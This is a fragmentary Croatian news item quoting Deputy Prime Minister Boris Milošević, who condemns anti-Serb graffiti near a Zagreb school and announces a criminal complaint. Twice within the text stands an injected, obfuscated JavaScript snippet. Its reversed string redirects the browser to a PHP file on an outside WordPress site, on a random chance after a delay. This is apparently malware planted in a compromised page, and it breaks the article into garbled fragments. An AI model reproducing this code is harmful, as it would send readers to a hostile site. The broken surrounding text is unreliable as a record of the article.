MILOŠEVIĆ: Od grafita do nasilja mali je korak!

to blizu osnovne škole. Čime su ovakve poruke izazvane? Kome su upućene? Susjedima, Zagrepčanima srpske nacionalnosti?, objavio je danas na svojem fb profilu potpredsjednik Vlade Boris Milošević.
to prvi puta, a vjerojatno nažalost ni zadnji. Stalno ponavljam da je najvažnije da se ne smijemo naviknuti na govor mržnje, ne smijemo se naviknuti da je to nešto normalno što se događa, nešto svakodnevno. Ne smijemo oguglati i biti indiferentni.
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>Piscu ili piscima grafita ide kaznena prijava. Nadam se da će komunalci još danas obrisati ove poruke, napisao je Milošević.
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>foto: index.hr